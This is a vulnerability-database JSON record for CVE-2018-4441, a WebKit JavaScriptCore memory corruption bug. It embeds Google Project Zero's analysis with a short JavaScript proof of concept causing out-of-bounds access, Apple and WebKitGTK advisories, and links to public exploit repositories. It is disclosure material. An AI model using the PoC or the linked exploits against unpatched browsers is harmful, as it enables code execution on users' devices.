"impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-4441", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-4441", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201812-215", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-134472", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2018-4441", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-134472" }, { "db": "VULMON", "id": "CVE-2018-4441" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "CNNVD", "id": "CNNVD-201812-215" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9. WebKit is prone to a memory-corruption vulnerability. \nA remote attacker can leverage this issue to execute arbitrary code in the context of the user running the application. Failed exploit attempts may result in a denial-of-service condition. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A buffer error vulnerability exists in the WebKit component of several Apple products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. WebKit: JSC: A bug in JSArray::shiftCountWithArrayStorage \n\nCVE-2018-4441\n\n\nbool JSArray::shiftCountWithArrayStorage(VM\u0026 vm, unsigned startIndex, unsigned count, ArrayStorage* storage)\n{\n unsigned oldLength = storage-\u003elength();\n RELEASE_ASSERT(count \u003c= oldLength);\n \n // If the array contains holes or is otherwise in an abnormal state,\n // use the generic algorithm in ArrayPrototype. \n if ((storage-\u003ehasHoles() \u0026\u0026 this-\u003estructure(vm)-\u003eholesMustForwardToPrototype(vm, this)) \n || hasSparseMap() \n || shouldUseSlowPut(indexingType())) {\n return false;\n }\n\n if (!oldLength)\n return true;\n \n unsigned length = oldLength - count;\n \n storage-\u003em_numValuesInVector -= count;\n storage-\u003esetLength(length);\n\n\nConsidering the comment, I think the method is supposed to prevent an array with holes from going through to the code \"storage-\u003em_numValuesInVector -= count\". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So \"storage-\u003em_numValuesInVector\" can be controlled by the user. \n\nIn the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return true, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method. \n\nPoC:\nfunction main() {\n let arr = [1];\n\n arr.length = 0x100000;\n arr.splice(0, 0x11);\n\n arr.length = 0xfffffff0;\n arr.splice(0xfffffff0, 0, 1);\n}\n\nmain();\n\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\nor a patch has been made broadly available (whichever is earlier), the bug\nreport will become visible to the public. \n\n\n\n\nFound by: lokihardt\n\n. \nCVE-2018-4438: lokihardt of Google Project Zero\n\nInstallation note:\n\nSafari 12.0.2 may be obtained from the Mac App Store. ------------------------------------------------------------------------\nWebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0009\n------------------------------------------------------------------------\n\nDate reported : December 13, 2018\nAdvisory ID : WSA-2018-0009\nWebKitGTK+ Advisory URL : \nhttps://webkitgtk.org/security/WSA-2018-0009.html\nWPE WebKit Advisory URL : \nhttps://wpewebkit.org/security/WSA-2018-0009.html\nCVE identifiers : CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443, CVE-2018-4464. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n Credit to lokihardt of Google Project Zero. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n Credit to lokihardt of Google Project Zero. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n Credit to lokihardt of Google Project Zero. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n Credit to lokihardt of Google Project Zero. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n Processing maliciously crafted web content may lead to arbitrary\n code execution. \n\n\nWe recommend updating to the latest stable versions of WebKitGTK+ and\nWPE WebKit. It is the best way to ensure that you are running safe\nversions of WebKit. Please check our websites for information about the\nlatest stable releases. \n\nFurther information about WebKitGTK+ and WPE WebKit security advisories\ncan be found at: https://webkitgtk.org/security.html or\nhttps://wpewebkit.org/security/. \n\nThe WebKitGTK+ and WPE WebKit team,\nDecember 13, 2018\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2018-12-05-1 iOS 12.1.1\n\niOS 12.1.1 is now available and addresses the following:\n\nAirport\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A malicious application may be able to elevate privileges\nDescription: A type confusion issue was addressed with improved\nmemory handling. \nCVE-2018-4303: Mohamed Ghannam (@_simo36)\n\nDisk Images\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2018-4465: Pangu Team\n\nFaceTime\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A local attacker may be able to view contacts\nfrom the lock screen\nDescription: A lock screen issue allowed access to contacts on a\nlocked device. \nCVE-2018-4430: videosdebarraquito\n\nFile Provider\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A malicious application may be able to learn information\nabout the presence of other applications on the device\nDescription: This issue was addressed with improved entitlements. \nCVE-2018-4446: Luke Deshotels, Jordan Beichler, and William Enck of\nNorth Carolina State University; Costin CarabaE and RAzvan\nDeaconescu of University POLITEHNICA of Bucharest\n\nKernel\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: An attacker in a privileged position may be able to perform a\ndenial of service attack\nDescription: A denial of service issue was addressed by removing the\nvulnerable code. \nCVE-2018-4460: Kevin Backhouse of Semmle Security Research Team\n\nKernel\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A local user may be able to read kernel memory\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2018-4431: An independent security researcher has reported this\nvulnerability to Beyond Security\u0027s SecuriTeam Secure Disclosure\nprogram\n\nKernel\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A malicious application may be able to elevate privileges\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2018-4435: Jann Horn of Google Project Zero, Juwei Lin(@panicaII)\nand Junzhi Lu of TrendMicro Mobile Security Team\n\nKernel\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2018-4447: Juwei Lin(@panicaII) and Zhengyu Dong of TrendMicro\nMobile Security Team\n\nKernel\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2018-4461: Ian Beer of Google Project Zero\n\nLinkPresentation\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Processing a maliciously crafted email may lead to user\ninterface spoofing\nDescription: A spoofing issue existed in the handling of URLs. \nCVE-2018-4429: Victor Le Pochat of imec-DistriNet, KU Leuven\n\nProfiles\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: An untrusted configuration profile may be incorrectly\ndisplayed as verified\nDescription: A certificate validation issue existed in configuration\nprofiles. This was addressed with additional checks. \nCVE-2018-4436: James Seeley @Code4iOS, Joseph S. of Wyong High School\n\nSafari\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: A logic issue was addressed with improved validation. \nCVE-2018-4439: xisigr of Tencent\u0027s Xuanwu Lab (tencent.com)\n\nSafari\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Visiting a malicious website may lead to address bar spoofing\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2018-4440: Wenxu Wu of Tencent Security Xuanwu Lab\n(xlab.tencent.com)\n\nSafari\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: A user may be unable to fully delete browsing history\nDescription: \"Clear History and Website Data\" did not clear the\nhistory. \nCVE-2018-4445: William Breuer\n\nWebKit\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2018-4441: lokihardt of Google Project Zero\nCVE-2018-4442: lokihardt of Google Project Zero\nCVE-2018-4443: lokihardt of Google Project Zero\n\nWebKit\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A logic issue existed resulting in memory corruption. \nCVE-2018-4438: lokihardt of Google Project Zero\n\nWebKit\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed with\nimproved memory handling. \nCVE-2018-4437: HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of\nKAIST Softsec Lab, Korea\nCVE-2018-4464: HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of\nKAIST Softsec Lab, Korea\n\nAdditional recognition\n\nProfiles\nWe would like to acknowledge Luke Deshotels, Jordan Beichler, and\nWilliam Enck of North Carolina State University; Costin CarabaE and\nRAzvan Deaconescu of University POLITEHNICA of Bucharest for their\nassistance. \n\nSafariViewController\nWe would like to acknowledge YiAit Can YILMAZ (@yilmazcanyigit) for\ntheir assistance. \n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"iOS 12.1.1\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlwINzopHHByb2R1Y3Qt\nc2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3F1FhAA\nvJoYbLbK0j4TDxVDWzcyTTNdF/B2vaz3Ljw8WpsYmJaMazHxsvRe3UfqBdbz1hGL\n8hYBqdnjh+O9qck61tCWfH3A8f284onjL2XYdJC1NaRHr6pnJNJYU7peaavxbEty\nsduSMVImtPl8s9LROC0qpldpGWiRlORXUa3HZ7FDoagsy6BWW6J0srFIzylhyqZ4\nLxOZ/zWJE7J50dGRA2ixGT42OgeZhVJjJTSazA44pFepfSPYEogt57A3h3sfRHIg\n8Yj4rOeK+u92UqA4cTTaUwN+OZgy1HuL33tKFduYQU7IXxpNKoqL+HR0LR+HZ53O\nlLjOCAaxrEV4kWAMB5zt41JcFJu9fNfoCFG3jc+HQnlXfjP9/IZ/hH5vAQju8TO8\nJKs3Om1BdMc+UVm1JhdmxNGB3I1bE5TllyanfU2B7LR/RGXNYbnE0ibEiuTtwX1x\nhZN6a2MV3dBJajCeLT/t7tMiaHYbJ44KBLIRpnzvzbY2tSLjyWAxA/xpfFBSPCwM\nmGJo8uWj6KcgiM4rHEgas3FVK/9BRvDj7mpP+tYuMA5wTuJPZOsa2kMiIXcgjaLB\nykPlc/1GYrzkK9lRTXfu6y8+J1ngx1QGX5tMv7HyrdvCdp9c5OIOA3G9iVCUwRNr\ni10Ydh86HYDDPjbsGhNH+CT3fWnoFyYNg7F05Y+4piY=\n=aFkK\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2018-4441" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "BID", "id": "106340" }, { "db": "VULHUB", "id": "VHN-134472" }, { "db": "VULMON", "id": "CVE-2018-4441" }, { "db": "PACKETSTORM", "id": "150672" }, { "db": "PACKETSTORM", "id": "150935" }, { "db": "PACKETSTORM", "id": "150671" }, { "db": "PACKETSTORM", "id": "150673" }, { "db": "PACKETSTORM", "id": "150780" }, { "db": "PACKETSTORM", "id": "150670" }, { "db": "PACKETSTORM", "id": "150674" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=46522", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-4441" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-4441", "trust": 3.6 }, { "db": "JVN", "id": "JVNVU92431031", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-014901", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201812-215", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.0604", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "46522", "trust": 0.6 }, { "db": "BID", "id": "106340", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "150935", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "152029", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-134472", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-4441", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150672", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150671", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150673", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150780", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150670", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150674", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-134472" }, { "db": "VULMON", "id": "CVE-2018-4441" }, { "db": "BID", "id": "106340" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "PACKETSTORM", "id": "150672" }, { "db": "PACKETSTORM", "id": "150935" }, { "db": "PACKETSTORM", "id": "150671" }, { "db": "PACKETSTORM", "id": "150673" }, { "db": "PACKETSTORM", "id": "150780" }, { "db": "PACKETSTORM", "id": "150670" }, { "db": "PACKETSTORM", "id": "150674" }, { "db": "CNNVD", "id": "CNNVD-201812-215" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "id": "VAR-201904-1323", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-134472" } ], "trust": 0.01 }, "last_update_date": "2024-11-29T22:37:41.181000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HT209345", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209345" }, { "title": "HT209346", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209346" }, { "title": "HT209340", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209340" }, { "title": "HT209342", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209342" }, { "title": "HT209343", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209343" }, { "title": "HT209344", "trust": 0.8, "url": "https://support.apple.com/en-us/HT209344" }, { "title": "HT209340", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209340" }, { "title": "HT209342", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209342" }, { "title": "HT209343", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209343" }, { "title": "HT209344", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209344" }, { "title": "HT209345", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209345" }, { "title": "HT209346", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT209346" }, { "title": "Multiple Apple product WebKit Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=87498" }, { "title": "kexploit620FW-", "trust": 0.1, "url": "https://github.com/ktiOSz/kexploit620FW- " }, { "title": "6.20", "trust": 0.1, "url": "https://github.com/CloudFTL/6.20 " }, { "title": "PS4-6.20-WebKit-Code-Execution-Exploit", "trust": 0.1, "url": "https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit " }, { "title": "GaloisNeko", "trust": 0.1, "url": "https://github.com/GaloisNeko/GaloisNeko " }, { "title": "ja", "trust": 0.1, "url": "https://github.com/jakubolsaki/ja " }, { "title": "howmuch515", "trust": 0.1, "url": "https://github.com/howmuch515/howmuch515 " }, { "title": "", "trust": 0.1, "url": "https://github.com/sploitem/WebKitPwn " }, { "title": "Browser-Security-Information", "trust": 0.1, "url": "https://github.com/whiteHat001/Browser-Security-Information " } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-4441" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "CNNVD", "id": "CNNVD-201812-215" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-134472" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4441" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209340" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209342" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209343" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209344" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209345" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht209346" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-4441" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu92431031/index.html" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4464" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4438" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4442" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4437" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4443" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190497-1.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76166" }, { "trust": 0.6, "url": "https://www.exploit-db.com/exploits/46522" }, { "trust": 0.5, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.5, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4439" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4440" }, { "trust": 0.3, "url": "https://www.apple.com/" }, { "trust": 0.3, "url": "http://www.apple.com/ios/" }, { "trust": 0.3, "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1685\u0026desc=2" }, { "trust": 0.3, "url": "https://support.apple.com/en-ie/ht209346" }, { "trust": 0.3, "url": "https://support.apple.com/en-in/ht209340" }, { "trust": 0.3, "url": "https://support.apple.com/en-ie/ht209345" }, { "trust": 0.3, "url": "https://support.apple.com/en-ie/ht209342" }, { "trust": 0.3, "url": "https://support.apple.com/en-ie/ht209343" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4447" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4303" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4431" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4465" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4460" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4436" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4435" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4461" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4445" }, { "trust": 0.1, "url": "https://support.apple.com/ht204283" }, { "trust": 0.1, "url": "https://webkitgtk.org/security.html" }, { "trust": 0.1, "url": "https://webkitgtk.org/security/wsa-2018-0009.html" }, { "trust": 0.1, "url": "https://wpewebkit.org/security/." }, { "trust": 0.1, "url": "https://wpewebkit.org/security/wsa-2018-0009.html" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4430" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4446" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4429" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/download/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-134472" }, { "db": "BID", "id": "106340" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "PACKETSTORM", "id": "150672" }, { "db": "PACKETSTORM", "id": "150935" }, { "db": "PACKETSTORM", "id": "150671" }, { "db": "PACKETSTORM", "id": "150673" }, { "db": "PACKETSTORM", "id": "150780" }, { "db": "PACKETSTORM", "id": "150670" }, { "db": "PACKETSTORM", "id": "150674" }, { "db": "CNNVD", "id": "CNNVD-201812-215" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-134472" }, { "db": "VULMON", "id": "CVE-2018-4441" }, { "db": "BID", "id": "106340" }, { "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "db": "PACKETSTORM", "id": "150672" }, { "db": "PACKETSTORM", "id": "150935" }, { "db": "PACKETSTORM", "id": "150671" }, { "db": "PACKETSTORM", "id": "150673" }, { "db": "PACKETSTORM", "id": "150780" }, { "db": "PACKETSTORM", "id": "150670" }, { "db": "PACKETSTORM", "id": "150674" }, { "db": "CNNVD", "id": "CNNVD-201812-215" }, { "db": "NVD", "id": "CVE-2018-4441" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-04-03T00:00:00", "db": "VULHUB", "id": "VHN-134472" }, { "date": "2019-04-03T00:00:00", "db": "VULMON", "id": "CVE-2018-4441" }, { "date": "2018-12-05T00:00:00", "db": "BID", "id": "106340" }, { "date": "2019-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "date": "2018-12-06T18:56:28", "db": "PACKETSTORM", "id": "150672" }, { "date": "2018-12-27T04:44:44", "db": "PACKETSTORM", "id": "150935" }, { "date": "2018-12-06T18:56:18", "db": "PACKETSTORM", "id": "150671" }, { "date": "2018-12-06T18:56:38", "db": "PACKETSTORM", "id": "150673" }, { "date": "2018-12-13T23:55:55", "db": "PACKETSTORM", "id": "150780" }, { "date": "2018-12-06T18:56:07", "db": "PACKETSTORM", "id": "150670" }, { "date": "2018-12-06T18:56:47", "db": "PACKETSTORM", "id": "150674" }, { "date": "2018-12-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201812-215" }, { "date": "2019-04-03T18:29:16.283000", "db": "NVD", "id": "CVE-2018-4441" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-04-05T00:00:00", "db": "VULHUB", "id": "VHN-134472" }, { "date": "2019-04-05T00:00:00", "db": "VULMON", "id": "CVE-2018-4441" }, { "date": "2018-12-05T00:00:00", "db": "BID", "id": "106340" }, { "date": "2019-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-014901" }, { "date": "2019-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201812-215" }, { "date": "2024-11-21T04:07:24.980000", "db": "NVD", "id": "CVE-2018-4441" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201812-215" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Apple Memory corruption vulnerability in products", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-014901" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code execution", "sources": [ { "db": "PACKETSTORM", "id": "150672" }, { "db": "PACKETSTORM", "id": "150671" }, { "db": "PACKETSTORM", "id": "150673" }, { "db": "PACKETSTORM", "id": "150780" }, { "db": "PACKETSTORM", "id": "150670" }, { "db": "PACKETSTORM", "id": "150674" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.